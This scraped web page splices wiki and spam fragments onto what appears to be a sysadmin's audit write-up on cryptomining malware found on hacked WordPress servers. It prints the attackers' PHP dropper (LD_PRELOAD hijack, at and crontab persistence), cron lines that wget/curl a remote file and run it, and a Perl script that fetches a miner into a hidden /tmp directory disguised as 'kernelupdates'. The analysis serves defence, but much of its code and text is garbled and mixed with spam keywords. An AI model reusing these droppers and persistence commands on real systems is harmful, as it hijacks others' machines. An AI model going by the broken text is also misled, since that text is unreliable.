Jump to: navigation, search I use this script to run litecoin cpuminer.It changes the amount of miner threads depending on weather your pc is idle or not.This enabled me to use the computer normally when needed, but it will start mining when idle.Views Page Discussion History Personal tools Log in Search Tools Related changes Special pages Printable version Permanent linkWhat hardware to use for budget Litecoin Mining Rig 3Jun 23, 2016Jun 23, 2016 Can't find your answer ?When an attacker manages to compromise and get root access to a server or your notebook, his main goal usually is to steal sensitive information, to use it as a bridgehead for attacking other targets, to send spam or deny a service for causing money losses.When I started my sysadmin career path, more than ten years ago, almost all software exploits were used with the previous explained goals in mind, but something is changing since the crypto-currencies have begun to spread and gain real value.Bitcoin is the most famous crypto-currency nowadays.

Bitcoins can be obtained in exchange for legal currencies (dollar, euro, yen, yuan and so on) or as a reward for payment processing work, in which you offer your computing power to verify and record payments into the public ledger.This activity is called mining and is rewarded by transaction fees and newly created bitcoins.Bitcoin mining requires a huge amount of computation power, so miners usually create computing clusters for being able to generate them.bitcoin explorer scriptMining clusters can be heterogeneous: any kind of digital appliance connected to the Internet is a good candidate for joining the cluster.prix bitcoin 2010More powerful is the appliance CPU (or GPU), more valuable is the appliance itself.Attackers are starting to make profit by gaining access to servers, notebooks, smartphones or even simple appliances (smart washing machines, refrigerators, televisions, CCTV security cameras and so on) and stealing CPU/GPU cycles for mining crypto-currencies.Mining bitcoins by using low-end CPU is quite impossible nowadays, but there are other crypto-currencies that are easier to mine compared to bitcoins.texas holdem bitcoin poker

That’s why attackers has been targeting litecoin and dogecoin, which are literally a million times easier to mine.Trend Micro found a mining malware in several Android apps, a couple of which were listed in the official Google Play store and they have been downloaded by millions of users.Johannes Ullrich realized that there was a network of CCTV security cameras that were being used to mine for dogecoin.You can usually notice a mining malware on a smart phone due to the loss of performance or its “puzzling” overheat, but you may not recognise a similar issue on a modern multicore/multi-socket server.bitcoin daily kursMining malware tend to keep a low profile; even if a mining malware uses the 100% of one core of a 12-core CPU, it’s only using the 8% of the whole CPU power and it may not be noticed.I found the previously described scenario during two security audits requested by two different clients.date of bitcoin genesis block

There were more than 20 servers used for mining litecoins, all hacked using the same technique.All hacked servers hosted vulnerable WordPress platforms, they have been used to download and execute the following malicious PHP script.header("Content-type: text/plain"); print "2842123700 "; if (!bitcoin difficulty risefunction_exists('file_put_contents')) { function file_put_contents($filename, $data) { $f = @fopen($filename, 'w'); if (!$f) return false; $bytes = fwrite($f, $data); fclose($f); return $bytes; } } @system("killall -9 ".basename("/usr/bin/host")); $so32 = "...BINARY FILE SOURCE...";$arch = 64; if (intval("9223372036854775807") == 2147483647) $arch = 32; print "Arch is ".$arch." ";$so = $arch == 32 ?$so32 : $so64; $f = fopen("/usr/bin/host", "rb"); if ($f) { $n = unpack("C*", fread($f, 8)); $so[7] = sprintf("%c", $n[8]); print "System is ".($n[8]

fclose($f); } print "SO dumped ".file_put_contents("./libworker.so", $so)." ";if (getenv("MAYHEM_DEBUG")) exit(0); $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; /* second stage dropper */ $HBN=basename("/usr/bin/host"); $SCP=getcwd(); $SCR ="#!/bin/sh cd '".$SCP."' if[ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."' exportLD_PRELOAD=./libworker.so /usr/bin/host unset LD_PRELOAD "; $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab fi rm 1.sh exit 0 "; @file_put_contents("1.sh", $SCR); @chmod("1.sh", 0777); /* try at now, file will be removed, crontab cleaned on success */ @/...//.../abc.txt;perl abc.txt;rm -f abc.txt')|crontab", $ret); @system("at now -f 1.sh", $ret); if ($ret == 0) { for ($i = 0; $i < 5; $i++) { if (!@file_exists("1.sh")) { print "AT success "; exit(0); } sleep(1); } } @/...//.../abc.txt;perl abc.txt;rm -f abc.txt')|crontab", $ret); @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab",

$ret); if ($ret == 0) { for ($i = 0; $i < 62; $i++) { if (!@file_exists("1.sh")) { print "CRONTAB success "; exit(0); } sleep(1); } } print "Running straight "; @system("./1.sh");123456789(); ; (!()) { (, ) { = @(, ); (!) ; = (, ); (); ; }}@(.());= ; = ; (() ) = ; ..; = ?: ; = (, ); () { = (, (, 8)); [7] = (, [8]); .([8]: ).; ();} .(,.=;@(, );@(, );@(, );@(, ); ( 0) { ( = 0; < 5; ) { (!@()) { ; (0); } (1); }}@(, );@(.., ); ( 0) { ( = 0; < ; ) { (!@()) { ; (0); } (1); }} ;@();The script contains an ELF malware library inside the $so32 variable (I removed it), it was used to change how /usr/bin/host acts./...//.../abc.txt;perl abc.txt;rm -f abc.txt *//...//.../abc.txt;perl abc.txt;rm -f abc* *//...//.../abc.txt;perl abc.txt;rm -f abc.txt 10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://XX.XXX.XXX.XX/.../libcfg.txt;curl -O http://XX.XXX.XXX.XX/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php12345*/6 * * * * /;:*/6 * * * * /;:*/6 * * * * /;: 2 * * * -9 ///; /;:Thanks to the first cron task, a remote PERL script was downloaded every 10 seconds.

This is the source code of the last downloaded PERL script:#!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelupdates/gi) { die; } if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) { $wig=`wget --version | grep GNU`; if(length($wig>6)) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://X.XXX.XX.XXX/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://X.XX.XXX.XX/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://X.XXX.XX.XXX/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://X.XX.XXX.XXX/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } } @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-) "; :80 -u spdrman.".$rn."

-p passxxx &"); print "done! ";123456789();();();();();();();();();();();=1;=` -m`;(1 0) {=(());}=` //.-`;=` | -v | `;(=~//) { ; }(!~/) {=` | `;((>6)) {(=~//g) {();} {();}} {(=~//g) {();} {();}}}@=(,,,,,,,,,,,,,,,,,);=0;(()<4) { =[(())-1]; } ;(..); ;The script executes some cleanup tasks, checks the server environment, creates a hidden directory inside the /tmp directory called “.ice-unix” and then it downloads and extracts a tar.gz file that contains the minerd software.The last script command configures and executes the parasite mining software.The miner joins a mining pool, called “wemineltc”, through the stratum protocol and it uses a random username between “spdrman.0” and “spdrman.11”.The malware tries to camouflage itself by :By checking the web server logs and the creation date of several files and directories, I discovered that the parasite mining processes had been run for 3/4 months and no one noticed it!You should keep updated all Operating System and user applications, do system hardening and schedule weekly security checks, because checking a global dashboard with overall resource statistics and installing rkhunter or similar tools doesn’t guarantee that your servers don’t become zombies manipulated by a remote puppet master.